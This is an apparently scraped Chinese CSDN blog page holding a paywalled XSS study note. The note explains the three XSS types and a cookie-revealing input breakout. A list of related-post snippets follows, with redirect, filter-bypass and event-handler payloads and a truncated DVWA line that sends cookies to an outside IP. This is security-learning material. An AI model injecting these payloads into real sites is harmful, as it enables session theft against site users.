XSS学习笔记(一)-点击劫持

最新推荐文章于 2024-05-21 18:30:36 发布
最新推荐文章于 2024-05-21 18:30:36 发布
阅读量5.4k 收藏 7
点赞数 1
分类专栏: Web渗透学习 信安学习 文章标签: 蠕虫 XSS 点击劫持 非持久性攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l_f0rm4t3d/article/details/24178961
版权
所谓的XSS场景就是触发的XSS的场所,多数情况下都是攻击者在网页中嵌入(发表)的恶意脚本(Cross site Scripting),这里的触发攻击总是在浏览器端,达到攻击的者的目的,一般都是获取用户的Cookie(可以还原账户登录状态),导航到恶意网址,携带木马,作为肉鸡发起CC攻击,传播XSS蠕虫等。简单举一个场景:在一个页面有一个textbox 代码就是 这里的valuef
摘要由CSDN通过智能技术生成

所谓的XSS场景就是触发的XSS的场所,多数情况下都是攻击者在网页中嵌入(发表)的恶意脚本(Cross site Scripting),这里的触发攻击总是在浏览器端,达到攻击的者的目的,一般都是获取用户的Cookie(可以还原账户登录状态),导航到恶意网址,携带木马,作为肉鸡发起CC攻击,传播XSS蠕虫等。

总体分为三类:

Dom-Based(Dom式)
Stroed-Based(存储式)
Reflex-Based(反射式)

简单举一个场景:
在一个页面有一个textbox 代码就是<input type="text" name="address1" value="value1from"> 
这里的valuefrom 就是来自用户的输入,如果用户输入的不是valuefrom 的字符串,而是其他的代码就可能出现用户输入的数据被执行,如输入:"/><script>alert(document.cookie);</sc
最低0.47元/天 解锁文章
1_f0rm4t3d
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA XSS
weixin_46429206的博客
12-03 187
低 弹窗: <script>alert('xss')</script> <a href=’’ onclick=alert(‘你是傻子吧!’)>美女图片</a> 重定向:<script>window.location="http://www.4399.com"</script> 点forward跳转下一界面 Cookie:<script>new Image().src=”http://192.168.116.1
XSS学习笔记(一个)-劫持
weixin_34384681的博客
07-14 205
所谓XSS这个场景被触发XSS地方,在大多数情况下,攻者被嵌入在网页中(问题)该恶意脚本(Cross site Scripting),这里的攻始终触发浏览器端,攻的者的目的。一般都是获取用户的Cookie(能够还原账户登录状态),导航到恶意网址,携带木马,作为肉鸡发起CC攻。传播XSS蠕虫等。 整体分为三类: Dom-Based(Dom式) Stroed-Based(存储式)...
web安全学习笔记-劫持
sailtoyouSCU的专栏
05-18 1746
劫持原理就是,
XSS另类攻(二)表单劫持-获取账号信息
最新发布
05-21 871
XSS另类攻(二)表单劫持-获取账号信息,XSS在线平台方式和自己实现方式,分析二者的优缺点。
web常见漏洞 第三课-劫持
chijuejie1415的博客
03-08 184
劫持 前置知识: Iframe:iframe标签可以用来创建包含另外一个文档的内联框架 实例讲解: 例如我们将百度用ifrome标签嵌入到我们自己做的网站当中 <style> Html,body,ifrome( Display:bloc...
Webgoat学习笔记.zip
03-12
【WebGoat学习笔记】 WebGoat是一款由OWASP(开放网络应用安全项目)开发的在线教学平台,专门用于教授和实践网络安全中的Web应用程序漏洞。它是一个故意设计有漏洞的Web应用,帮助学习者了解并熟悉各种攻手段,...
安全测试学习笔记.pdf
05-28
安全测试是IT领域中至关重要的一个环节,它旨在确保软件或系统在运行过程中免受恶意攻,保护用户数据和系统安全。以下是一些关键的安全测试知识点: 1. **SQL注入**: SQL注入是一种常见的安全漏洞,攻者通过...
shiro学习笔记
12-20
在"shiro学习笔记"这个资源中,你将深入理解Shiro的核心概念和使用方法,同时结合Spring(SSM中的S)进行框架整合,为你的Web应用构建安全的环境。 1. **Shiro基础** - **认证**:Shiro提供了一套完整的认证流程,...
Web-安全渗透全套教程20XSS跨.zip
05-22
【标题】"Web-安全渗透全套教程20XSS跨.zip"揭示了这是一份关于Web安全渗透测试的教育资料,特别关注XSS(Cross-Site Scripting,跨站脚本攻)这一主题。XSS是一种常见的网络安全漏洞,攻者通过注入恶意脚本到...
Cookie、Session学习笔记
03-18
这篇学习笔记将深入探讨它们的工作原理、使用场景以及优缺点。 **Cookie** Cookie是一种在客户端(用户的浏览器)和服务器之间传递信息的技术。服务器在响应中设置Cookie,浏览器在后续的请求中携带Cookie返回。...
网络渗透测试平台DVWA-1.9
12-03
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
XSS跨站脚本攻(一)----XSS的三种类型
热门推荐
fendo
12-27 12万+
一、简介 什么是XSS? 百度百科的解释: XSS又叫CSS  (Cross Site Script) ,跨站脚本攻。它指的是恶意攻者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 它与SQL注入攻类似,SQL注入攻中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在x
xss跳转代码_XSS之Beef神器
weixin_39821189的博客
11-20 476
No.1声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。No.2前言Beef 是目前最为流行的 web 框架攻平台,...
XSS漏洞的绕过策略
weixin_51313108的博客
08-17 875
XSS漏洞的绕过策略防绕过语句绕过js代码显示在属性内大写绕过双写关键字javascript特殊事件javascript特殊事件 防绕过语句 htmlspecialchars()语句可以将<>等敏感字符改动为html字符实体,用于变量的处理上。 绕过 首先要明白一点写入的JS代码要在浏览器上成功执行尽量要在标签之间 js代码显示在属性内 '><script>alert(1)</script>//:闭合标签 大写绕过 猜测后端如果只是简单的利用 ,str_replac
XSS漏洞-03】XSS漏洞语句构造和绕过方法实例
m0_64378913的博客
05-14 4152
目录1 XSS语句构造方式1.1 第一种:利用[<>]构造HTML/JS语句1.2 第二种:利用javascript:伪协议1.3 第三种:事件驱动1.4 第四种:利用CSS(层叠样式脚本)1.5 其他标签及手法2 XSS语句变形及绕过2.1 第一种:大小写混编2.2 第二种:**双写绕过**。2.3 第三种:**引号的使用**2.4 第四种:使用 [/] 代替空格2.5 第五种:在一些关键字内插入回车符与Tab符2.6 第六种:编码绕过2.7 第七种:拆分跨站2.8
32个触发事件XSS语句的总结
weixin_33788244的博客
01-26 443
作者为monyer 1、onmouseenter:当鼠标进入选区执行代码 <div style="background-color:red" onmouseenter="alert('bem')">123456</div> 2、onmouseleave:当鼠标离开选区执行代码 <DIV style="BACKGROUND-COLO...
安全防范知识点(XSS、CSRF、点劫持、中间人攻
远方
03-11 2425
什么是XSS?如何防范XSS?什么是CSP? XSS简单来说,就是攻者想尽一切办法可以执行的代码注入到网页中。 XSS可以分为多种类型,但是总体上分为两类:持久型和非持久型。 持久型也就是攻的代码被服务端写入数据库中,这种攻危害性很大,因为如果网站访问量很大的话,就会到导致大量正常访问页面的用户都受到攻。 举个例子,对于评论功能来说,就是防范持久型XSS,因为我可以在评论中输入...
XSS插入绕过一些方式总结
煜铭2011
05-05 7万+
0x00前言 我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射、存储、DOM这三类,至于具体每个类别的异同之处,本文不做学术介绍,直接介绍实际的插入方式。 0x01 常规插入及其绕过 1 Script 标签 绕过进行一次移除操作: <scr<script&g...
DOM-XSS漏洞挖掘与攻面全面解析
DOM-XSS(Document Object Model Cross-Site Scripting)是一种特殊的跨站脚本攻,针对的是浏览器解析和执行JavaScript的能力,而非传统的HTTP响应头部。这种漏洞主要利用了HTML文档对象模型(DOM)的动态特性,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值